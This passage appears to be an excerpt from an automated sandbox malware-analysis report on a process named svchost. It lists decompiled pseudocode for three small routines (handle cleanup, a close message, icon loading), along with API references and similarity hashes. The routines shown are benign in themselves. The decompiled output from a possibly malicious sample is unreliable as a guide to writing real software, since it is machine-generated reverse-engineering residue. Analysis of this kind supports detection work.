					L6:
					_t25 = _v8;
					__eflags =  *(_t25 + 0x28c);
					if( *(_t25 + 0x28c) != 0) {
						CloseHandle( *(_v8 + 0x28c));
						 *(_v8 + 0x28c) = 0;
					}
					__eflags =  *(_v8 + 0x2a0);
					__eflags = 0 |  *(_v8 + 0x2a0) == 0x00000000;
					if(__eflags == 0) {
						__eflags = _v8 + 0x2a4;
						E004280B0(_v8 + 0x2a4);
					}
					return E00416120(_v8, __eflags);
				}
				 *((intOrPtr*)(_v8 + 0x284)) = 2;
				while( *((intOrPtr*)(_v8 + 0x284)) != 0) {
				}
				_t30 = _v8;
				__eflags =  *(_t30 + 0x28c);
				if( *(_t30 + 0x28c) != 0) {
					WaitForSingleObject( *(_v8 + 0x28c), 0xffffffff);
				}
				goto L6;
			}






    0x0041aa83
    0x0041aa84
    0x0041aa91
    0x0041aacc
    0x0041aacc
    0x0041aacf
    0x0041aad6
    0x0041aae2
    0x0041aaeb
    0x0041aaeb
    0x0041aafa
    0x0041ab04
    0x0041ab06
    0x0041ab0b
    0x0041ab11
    0x0041ab11
    0x0041ab21
    0x0041ab21
    0x0041aa96
    0x0041aaa0
    0x0041aaac
    0x0041aaae
    0x0041aab1
    0x0041aab8
    0x0041aac6
    0x0041aac6
    0x00000000

    APIs
    • WaitForSingleObject.KERNEL32(00000000,000000FF,^I,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 0041AAC6
    • CloseHandle.KERNEL32(00000000,^I,?,0041A8CF,^I,00418896,00000001,00000000,000000FF), ref: 0041AAE2
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CloseHandleObjectSingleWait
    • String ID: ^I
    • API String ID: 528846559-3473481074
    • Opcode ID: d22e4dd4c5fb07b0915310ee32d943376b8e73b0ba91f7d73db55a64df2d9507
    • Instruction ID: 2af4e16d044692d2dc8553b327cdf41f61ac966da2f9d0a49496e5f6562ad222
    • Opcode Fuzzy Hash: d22e4dd4c5fb07b0915310ee32d943376b8e73b0ba91f7d73db55a64df2d9507
    • Instruction Fuzzy Hash: 4011D638A02105EBDB14DB54D69CBEE73B2AF84304F6881B9E4051B391CB795E41EB55
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0048A693 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40windowCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0048A693(void* __ecx) {
				intOrPtr _t23;
				intOrPtr* _t27;
				void* _t29;
				intOrPtr* _t30;
				void* _t32;

				E00473304(E00490F9C, _t32);
				_t30 = E00483003(0x10);
				_t27 = _t29;
				 *((intOrPtr*)(_t32 - 0x14)) = _t30;
				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					E004837D7(_t30);
					_t23 =  *0x4b8924; // 0x4b8938
					_t4 = _t30 + 0xc; // 0xc
					_t27 = _t4;
					 *_t27 = _t23;
					_t5 = _t32 + 8; // 0x0
					_t6 = _t32 + 0xc; // 0xc1241034
					 *(_t32 - 4) = 2;
					 *_t30 = 0x49d010;
					 *((intOrPtr*)(_t30 + 8)) =  *_t5;
					E004833FF(_t27,  *_t6);
				}
				 *(_t32 - 4) =  *(_t32 - 4) | 0xffffffff;
				_t11 = _t32 - 0x10; // 0x494608
				 *((intOrPtr*)(_t32 - 0x10)) = _t30;
				E00472E92(_t11, 0x4a5570);
				return SendMessageA( *( *((intOrPtr*)(_t27 + 0x1c)) + 0x1c), 0x10, 0, 0);
			}








    0x0048a698
    0x0048a6a7
    0x0048a6a9
    0x0048a6aa
    0x0048a6ad
    0x0048a6b3
    0x0048a6e0
    0x0048a6b5
    0x0048a6b7
    0x0048a6bc
    0x0048a6c1
    0x0048a6c1
    0x0048a6c4
    0x0048a6c6
    0x0048a6c9
    0x0048a6cc
    0x0048a6d0
    0x0048a6d6
    0x0048a6d9
    0x0048a6d9
    0x0048a6e2
    0x0048a6e6
    0x0048a6ef
    0x0048a6f2
    0x0048a70a

    APIs
    • __EH_prolog.LIBCMT ref: 0048A698
    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 0048A704
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: H_prologMessageSend
    • String ID: Status
    • API String ID: 2337391251-2091671594
    • Opcode ID: 3796ba2c147473299d3d85fd2a2b39f93812a123aaaa5fa830fc60d08fa8ca87
    • Instruction ID: afcea4d7c001ec068e5533b0c1078ec65b9e5925f433798d8fa723041570b9eb
    • Opcode Fuzzy Hash: 3796ba2c147473299d3d85fd2a2b39f93812a123aaaa5fa830fc60d08fa8ca87
    • Instruction Fuzzy Hash: 6A018470901214AFDF20EF64C905B9EBBA0EF04718F20895FF954AB191E7F89B01DB89
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00420380 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00420380(struct HINSTANCE__* _a4, CHAR* _a8, intOrPtr* _a12, char _a16) {
				void* _t6;
				struct HINSTANCE__* _t10;
				CHAR* _t11;

				_t11 = _a8;
				_t10 = _a4;
				 *_a12 = LoadImageA(_t10, _t11, 1, 0x20, 0x20, 0);
				_t6 = LoadImageA(_t10, _t11, 1, 0x10, 0x10, 0);
				_t4 =  &_a16; // 0x41522b
				 *( *_t4) = _t6;
				return _t6;
			}






    0x00420388
    0x0042038d
    0x004203ab
    0x004203ad
    0x004203af
    0x004203b6
    0x004203b8

    APIs
    • LoadImageA.USER32(?,?,00000001,00000020,00000020,00000000), ref: 0042039B
    • LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 004203AD
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ImageLoad
    • String ID: +RA
    • API String ID: 306446377-1108295363
    • Opcode ID: 6c9b51cbf4e8a77a6cf66faf12c38e8da9a7ee9024dcb9684fa3d373200c04e9
    • Instruction ID: b0eb1517b24abdeb61cc5f6169811e4bf34e3c41e60c97d7a53f11b58278252a
    • Opcode Fuzzy Hash: 6c9b51cbf4e8a77a6cf66faf12c38e8da9a7ee9024dcb9684fa3d373200c04e9
    • Instruction Fuzzy Hash: DDE0ED3234131177D620CE5A8C85F9BF7E9EB8DB10F100819B344AB1D1C2F1B44586A9
    Uniqueness

    Uniqueness Score: -1.00%